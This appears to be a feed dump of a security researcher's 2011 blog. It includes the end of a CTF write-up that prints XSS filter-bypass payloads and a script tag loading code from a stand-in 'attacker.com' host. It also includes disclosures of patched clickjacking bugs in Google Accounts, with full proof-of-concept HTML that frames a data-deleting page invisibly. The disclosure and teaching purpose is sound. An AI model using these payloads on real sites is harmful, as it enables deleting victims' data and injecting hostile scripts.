<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-lfs6NwC-woU/TvArMsplwpI/AAAAAAAAAfA/Q-OCVEu8gZY/s1600/Final4.JPG" imageanchor="1"><img border="0" height="95" src="http://2.bp.blogspot.com/-lfs6NwC-woU/TvArMsplwpI/AAAAAAAAAfA/Q-OCVEu8gZY/s400/Final4.JPG" width="400" /></a></div><br />
It seemed alerting the cookie was not going to help, so the next step was to include external JavaScript. As script tags were not working, I tried bypasses for the filter. The basic one is a mixed-case combination of letters, which a case-sensitive filter misses: <span style="background-color: #999999;"><ScRiPt>alert(1)</script></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-9QCwi52HX4M/TvAruOzKAwI/AAAAAAAAAfM/jc6RNFBQIuo/s1600/Final5.JPG" imageanchor="1"><img border="0" height="145" src="http://1.bp.blogspot.com/-9QCwi52HX4M/TvAruOzKAwI/AAAAAAAAAfM/jc6RNFBQIuo/s400/Final5.JPG" width="400" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-qrpFdVPCI7A/TvArzkr0udI/AAAAAAAAAfY/ZKh0nI-I2OQ/s1600/Final6.JPG" imageanchor="1"><img border="0" height="113" src="http://1.bp.blogspot.com/-qrpFdVPCI7A/TvArzkr0udI/AAAAAAAAAfY/ZKh0nI-I2OQ/s400/Final6.JPG" width="400" /></a></div><br />
Next, I included a demo external script:<br />
<span style="background-color: #999999;"><script src="http://attacker.com/evil.js"></script></span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cWKtbNXVsG8/TvAr-Y0AltI/AAAAAAAAAfk/MyItGTqmuvI/s1600/Final7.JPG" imageanchor="1"><img border="0" height="153" src="http://4.bp.blogspot.com/-cWKtbNXVsG8/TvAr-Y0AltI/AAAAAAAAAfk/MyItGTqmuvI/s400/Final7.JPG" width="400" /></a></div><br />
It worked and gave away the flag string and a link to submit the flag.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Z05ZokviIzE/TvAsFMRelAI/AAAAAAAAAfw/CbWqXM-K86Y/s1600/Final8.JPG" imageanchor="1"><img border="0" height="142" src="http://1.bp.blogspot.com/-Z05ZokviIzE/TvAsFMRelAI/AAAAAAAAAfw/CbWqXM-K86Y/s400/Final8.JPG" width="400" /></a></div><br />
ClubHack replied to one of my tweets after the flag submission.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-seQmhA5zikA/TvAsO90hDhI/AAAAAAAAAf8/tiy1FZmu6cM/s1600/twitter3.png" imageanchor="1"><img border="0" height="148" src="http://3.bp.blogspot.com/-seQmhA5zikA/TvAsO90hDhI/AAAAAAAAAf8/tiy1FZmu6cM/s320/twitter3.png" width="320" /></a></div><br />
After 3 days of effort, it paid off well. I enjoyed the ClubHack event. Thanks to the ClubHack team & NII for creating this CTF.<br />
<br />
I hope you enjoyed this post. Any comments, suggestions are welcome.</div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com3tag:blogger.com,1999:blog-1544325078740292092.post-41209127855619008342011-12-13T20:56:00.000-08:002011-12-13T20:56:11.474-08:00Presentation: Make Profit with UI-Redressing AttacksSlides from Null Pune Chapter Oct-2011 meet presentation. <br />
<br />
<div style="width:425px" id="__ss_10579166"><strong style="display:block;margin:12px 0 4px"><a href="http://www.slideshare.net/null0x00/make-profit-with-uiredressing-attacks" title="Make profit with UI-Redressing attacks." target="_blank">Make profit with UI-Redressing attacks.</a></strong> <iframe src="http://www.slideshare.net/slideshow/embed_code/10579166" width="425" height="355" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe> <div style="padding:5px 0 12px">View more <a href="http://www.slideshare.net/" target="_blank">presentations</a> from <a href="http://www.slideshare.net/null0x00" target="_blank">n|u - The Open Security Community</a> </div></div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com3tag:blogger.com,1999:blog-1544325078740292092.post-58738063679403225002011-09-14T23:03:00.000-07:002011-09-14T23:03:01.663-07:00Hijacking 2 clicks in Google Accounts<div dir="ltr" style="text-align: left;" trbidi="on">This vulnerability was the same as my <a href="http://amolnaik4.blogspot.com/2011/09/remove-google-books-with-clickjacking.html">previous post</a> but more challenging in terms of exploitation. In this case, the attacker needs to hijack 2 user clicks to complete the desired action.<br />
<br />
It starts with the <a href="https://accounts.google.com/EditServices">Google Products</a> page, where you can remove a listed service from your Google Account.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-T9p450Di680/TnGSM7DgSwI/AAAAAAAAAZc/H6B97wIFapo/s1600/poc6.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="http://4.bp.blogspot.com/-T9p450Di680/TnGSM7DgSwI/AAAAAAAAAZc/H6B97wIFapo/s400/poc6.JPG" width="400" /></a></div><br />
Once the user decides to remove a service, for example Google Health, they are presented with the following page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Q46juPxCjiY/TnGSJvUbOPI/AAAAAAAAAZI/F032YtmmWnE/s1600/poc1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="http://4.bp.blogspot.com/-Q46juPxCjiY/TnGSJvUbOPI/AAAAAAAAAZI/F032YtmmWnE/s400/poc1.JPG" width="400" /></a></div><br />
To remove the service, the user first needs to tick the checkbox. Only then does the “Remove Google Health” button become active; when clicked, it removes the respective service from the Google Account.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-SB_hzL5evNM/TnGSKek15RI/AAAAAAAAAZM/QmMvcXFcTdc/s1600/poc2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://1.bp.blogspot.com/-SB_hzL5evNM/TnGSKek15RI/AAAAAAAAAZM/QmMvcXFcTdc/s400/poc2.JPG" width="400" /></a></div><br />
To exploit this, I used the “Fake Captcha” technique, which hijacks the required 2 clicks and removes the targeted service. Here is how the attack page looks.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-aEasyGsLgp8/TnGSK6akTmI/AAAAAAAAAZQ/9RWnz8MIii0/s1600/poc3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="http://3.bp.blogspot.com/-aEasyGsLgp8/TnGSK6akTmI/AAAAAAAAAZQ/9RWnz8MIii0/s400/poc3.JPG" width="400" /></a></div><br />
This page has an invisible iframe which renders the remove-service page from Google Accounts. The correct answer, in this case ‘30’, is placed over the checkbox of the vulnerable page, and the ‘Submit Answer’ button over the ‘Remove Google Health’ button.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-MdhfCOEDrdI/TnGSLpkxSUI/AAAAAAAAAZU/NRxHUli3ZOY/s1600/poc4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://3.bp.blogspot.com/-MdhfCOEDrdI/TnGSLpkxSUI/AAAAAAAAAZU/NRxHUli3ZOY/s400/poc4.JPG" width="400" /></a></div><br />
When an authenticated user clicks on the right answer to the arithmetic question, he/she is actually clicking the checkbox, which enables the “Remove Google Health” button.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-uQQ72px_FEo/TnGSMIQe8ZI/AAAAAAAAAZY/TBKTlYZMiLw/s1600/poc5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="http://2.bp.blogspot.com/-uQQ72px_FEo/TnGSMIQe8ZI/AAAAAAAAAZY/TBKTlYZMiLw/s400/poc5.JPG" width="400" /></a></div><br />
Now he/she needs to complete the process by submitting the answer. Once the “Submit Answer” button is clicked, the targeted service is removed from his/her Google Account.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-uN92bvtiXcc/TnGSJKL2duI/AAAAAAAAAZE/A6KaPDm0M2I/s1600/poc7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://1.bp.blogspot.com/-uN92bvtiXcc/TnGSJKL2duI/AAAAAAAAAZE/A6KaPDm0M2I/s400/poc7.JPG" width="400" /></a></div><br />
<a href="https://accounts.google.com/DeleteService?service=health">Remove Google Health</a>, <a href="https://accounts.google.com/DeleteService?service=hist">Remove Google Web History</a> and <a href="https://accounts.google.com/DeleteService?service=orkut">Remove Orkut</a> were vulnerable to this attack.<br />
<br />
Google was very quick to patch this vulnerability.<br />
<br />
Hope you enjoyed reading this. Suggestions, comments are welcome.</div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com2tag:blogger.com,1999:blog-1544325078740292092.post-40635643192144209152011-09-13T00:11:00.000-07:002011-09-13T02:34:25.067-07:00Remove Google Books with Clickjacking<div dir="ltr" style="text-align: left;" trbidi="on">
Google Accounts has options to remove <a href="https://accounts.google.com/EditServices">Google Products</a>. One of them was to <a href="http://www.google.com/books?op=purge&continue=http://www.google.com/accounts/EditServices">remove Google Books</a> permanently.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="http://2.bp.blogspot.com/-HWSQUqmSMlM/Tm7-AP9iADI/AAAAAAAAAY0/SF2GaAgChMI/s1600/poc4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="259" src="http://2.bp.blogspot.com/-HWSQUqmSMlM/Tm7-AP9iADI/AAAAAAAAAY0/SF2GaAgChMI/s640/poc4.JPG" width="640" /></a></div>
<br />
This action was well protected against <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29">CSRF</a> using tokens. However, it was possible to render this page in an iframe due to the absence of clickjacking protections such as <a href="https://www.owasp.org/index.php/Clickjacking#Best-for-now_implementation">Frame Bursting Code</a> or the <a href="https://developer.mozilla.org/en/The_X-FRAME-OPTIONS_response_header">X-FRAME-OPTIONS</a> header.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-YYzC_YsEMA8/Tm798wQS2UI/AAAAAAAAAYo/nVuer7PxX0E/s1600/poc1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-YYzC_YsEMA8/Tm798wQS2UI/AAAAAAAAAYo/nVuer7PxX0E/s1600/poc1.JPG" /></a></div>
<br />
To carry out a successful clickjacking attack, an attacker needs to place a dummy button on top of the “<b>OK</b>” button of the vulnerable page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-MUQgUATDPLI/Tm79_CkNNAI/AAAAAAAAAYs/1Ldc83u0KKk/s1600/poc2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-MUQgUATDPLI/Tm79_CkNNAI/AAAAAAAAAYs/1Ldc83u0KKk/s1600/poc2.JPG" /></a></div>
<br />
The page presented to victim looks like this.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WvKX3h6Udbc/Tm79_SFIq2I/AAAAAAAAAYw/WA_ZZH0IWnk/s1600/poc3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-WvKX3h6Udbc/Tm79_SFIq2I/AAAAAAAAAYw/WA_ZZH0IWnk/s1600/poc3.JPG" /></a></div>
<br />
When an authenticated user browses to the above page hosted on the attacker’s site, the invisible iframe loads the remove Google Books page, complete with valid anti-CSRF tokens. When the user clicks the “<b>Click</b>” button, he/she actually clicks the “<b>OK</b>” button on the vulnerable page, and all of that user’s reviews, ratings and libraries are deleted.<br />
<br />
This attack needs only one click and works like <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29">CSRF</a>.<br />
<br />
<b>Edit:</b> Here is the demo code used for this exploit:<br />
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:minor-fareast;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
<br />
<pre style="background: rgb(191, 191, 191); font-family: &quot;Courier New&quot;,Courier,monospace; font-size: 10pt;">
&lt;html&gt;
&lt;head&gt;
&lt;style&gt;
button.dummy{position:absolute;top:8px;left:18px;z-index:-10}

#victim {
opacity: 0;
position: absolute;
top: -640px;
left: -55px;
overflow: hidden;
width:800px;
height: 700px;
}
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;button type="button" class="dummy"&gt;Click&lt;/button&gt;
&lt;div id=victim&gt;
&lt;iframe src="http://www.google.com/books?op=purge&amp;continue=http://www.google.com/accounts/EditServices" border=0 scrolling=no width=350 height=900&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</pre>
<br />
<br />
I would like to thank Google for choosing this bug for a reward.<br />
<br /></div>
AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com7tag:blogger.com,1999:blog-1544325078740292092.post-86737918325872221992011-09-12T01:27:00.000-07:002011-09-12T10:56:12.802-07:00Using sqlmap for testing HTTPS sites<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Update:</b> <i>By default, sqlmap supports SSL. Somehow it didn't work for my friend, so I tried the --proxy option to find an alternate way.</i><br />
<br />
Last week, one of my friends asked me how to use sqlmap against HTTPS sites. I had never tried that, but I was sure there would be a way to do it. I quickly checked the sqlmap documentation and came across the <span style="background-color: #999999;">--proxy</span> switch.<br />
<br />
